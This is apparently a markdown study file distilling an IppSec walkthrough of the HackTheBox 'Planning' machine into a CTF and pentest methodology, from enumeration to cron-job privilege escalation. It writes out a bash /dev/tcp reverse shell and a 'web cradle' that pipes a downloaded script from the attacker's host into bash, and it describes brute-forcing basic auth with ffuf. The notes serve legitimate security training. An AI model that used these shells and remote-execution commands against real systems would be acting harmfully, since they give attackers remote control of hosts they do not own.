arman-rai/meow/900 Case study - Ippsec/Planning.md

 - sed is used to append the known password (S0 riot 3C) to each username in the wordlist, creating username:password pairs.
 - ffuf is then used with the enc encoder to Base64 encode the FUZZ payload before sending the request: ffuf -request login.request -request-proto http -w users.txt:FUZZ -enc FUZZ:b64 -mc all.
 - Filtering for a 200 status code (-fc 401) reveals the correct username that resulted in a successful login.
 This demonstrates how "fuff has encoders so we could like URL encode something we can base 64 encode."

+# Methodology
+### I. Advanced Reconnaissance and Enumeration

+1. **Comprehensive Port and Service Scanning:** Beyond basic port scans, use `nmap` with flags like `-sc` for default scripts, `-sv` for version enumeration, and `-vvv` for verbose output to get detailed information about open ports and running services.
+2. **Virtual Host Scanning:** This is crucial for discovering hidden subdomains, which often host vulnerable applications (e.g., `grafana.planning.htb`).
+Tools like **GoBuster** are essential, and you should understand their syntax, including options like `append domain` for accurate results.
+3. **Directory and File Enumeration:** Utilize tools like GoBuster with specific extensions (e.g., `.php`) to find potential files and directories that might reveal information or vulnerabilities.
+4. **Automated Vulnerability Scanning:** Incorporate tools like **Nuclei** to automatically identify common misconfigurations or known vulnerabilities that might be missed during manual checks.
+5. **Understanding HTTP Headers and their Security Implications:** While often seen as low-severity, learn the purpose of security headers (e.g., `X-Frame-Options`, `Content-Security-Policy`, `Strict-Transport-Security`).
+More importantly, learn how to **demonstrate the impact** of missing or misconfigured headers (e.g., how `X-Frame-Options` prevents clickjacking, or how `Content-Security-Policy` can mitigate Cross-Site Scripting) to make findings more impactful.
+6. **Fuzzing and Input Validation Testing:** Use tools like **Burp Suite** to intercept requests and test various inputs (e.g., single quotes, double quotes, SQL injection payloads like `1=1`, or wildcards like `%`) to identify error messages or behavioral changes that indicate vulnerabilities.
+Be aware that some websites might detect the use of proxies like Burp Suite.
+7. **Adding to Hosts File:** Practice adding discovered hostnames to your `/etc/hosts` file (e.g., `planning.htb`, `grafana.planning.htb`) to properly access web applications.

+### II.
+Vulnerability Identification and Exploitation

+1. **Identifying Out-of-Date Software:** Actively look for version numbers of running services or applications (e.g., Grafana 11.0.0).
+This is a strong indicator of potential vulnerabilities.
+2. **Leveraging Public Exploits and CVEs:**
+    - Learn to effectively use resources like **CVE Details** to find known vulnerabilities for specific products and versions.
+    - Search **GitHub** for Proof of Concepts (PoCs) related to identified CVEs.
+    - Understand how to set up and execute PoCs, including managing dependencies using Python virtual environments (`python3 -m venv`, `pip3 install -r requirements.txt`).
+3. **Crafting and Delivering Reverse Shells:**
+    - Understand the syntax for common reverse shell payloads (e.g., `bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'`).
+    - **Master the "Web Cradle" technique:** This involves setting up a simple HTTP server on your machine (`python3 -m http.server`) and having the target download and execute a shell script using `curl` (e.g., `curl http://YOUR_IP:PORT/shell.sh | bash`).
+This method is preferred for troubleshooting as it helps determine if network connectivity (outbound requests) or payload special characters are causing issues, making debugging much easier.
+4. **Advanced Brute-Forcing with Fuzzing Tools:** Learn to use tools like **Fuff** with encoders for more complex brute-forcing scenarios, such as HTTP Basic authentication.
+This involves understanding how to craft requests, use wordlists, apply encoders (e.g., Base64 encoding for `username:password`), and filter results to identify successful attempts.
+This provides a deeper understanding than relying solely on dedicated brute-forcing tools like Hydra.

+### III.
+Post-Exploitation and Privilege Escalation

+1. **Container Environment Awareness:** Recognize when you are in a Docker container (e.g., from hostname or specific file paths like `/docker-init`).
+Learn to check environment variables for credentials or other sensitive information within containers.
+2. **Local Host Enumeration:**
+    - **Process Monitoring:** Understand how to list running processes (`ps aux` or `ps -ef`), but also be aware of techniques like `hide_pid=2` that can limit visibility into processes run by other users.
+    - **Local Port Scanning:** Actively look for services listening on `localhost` (e.g., ports 8000, 3000) using `curl` or by examining configuration files.
+These internal services often contain vulnerabilities or credentials.
+    - **Database Investigation:** If database credentials are found, learn to connect to local databases (e.g., MySQL) and enumerate databases, tables, and their contents.
+3. **SSH Port Forwarding:** Master the use of SSH local port forwarding (`-L`) to access services listening only on `localhost` from your attacking machine, bridging the network gap.
+4. **Cron Job Analysis and Exploitation:**
+    - Locate and analyze cron job files (e.g., `crontab.db` in `/opt`) to understand scheduled tasks and their execution frequency.
+    - Identify opportunities to create **malicious cron jobs** for privilege escalation (e.g., creating a cron job that runs as root and executes your reverse shell or command).
+5. **Service Enumeration:** Explore system services (e.g., using `systemctl list-unit-files --type=service` or `find /etc/systemd -type f -name "*.service"`) to discover running applications and their configurations, which may reveal default credentials or vulnerabilities.
+6. **File System Review:** Systematically check common directories like `/opt` for installed applications or unusual files, and `/etc` for configuration files that might contain credentials or misconfigurations.
+7. **Parsing JSON Data:** Use tools like **`jq`** to pretty-print and easily read JSON formatted configuration files.

+### IV.
+General Tools and Mindset

+1. **Tool Mastery and Troubleshooting:**
+    - Continuously test your tools.
+CTFs are excellent opportunities to discover when a tool's syntax has changed or if it's not working as expected (e.g., GoBuster's behavior with virtual hosts).
+    - Learn to read and understand error messages, and consult documentation when tools behave unexpectedly.
+2. **Breaking Down Complex Tasks:** When an exploit fails or a payload doesn't work, learn to break down the process into smaller, testable steps.
+This helps pinpoint exactly where the issue lies (e.g., using the web cradle for reverse shells helps determine if the issue is network connectivity or payload syntax).
+3. **Text Manipulation with `sed`:** Become proficient with command-line tools like `sed` for tasks such as inserting specific strings (like `username:password`) into a wordlist, which is useful for advanced brute-forcing.
+4. **Attention to Detail:** Small details, like version numbers or specific error messages, can often be the key to finding and exploiting vulnerabilities.

+By focusing on these areas, you will develop a more robust skillset for tackling complex CTF challenges and understanding real-world penetration testing scenarios.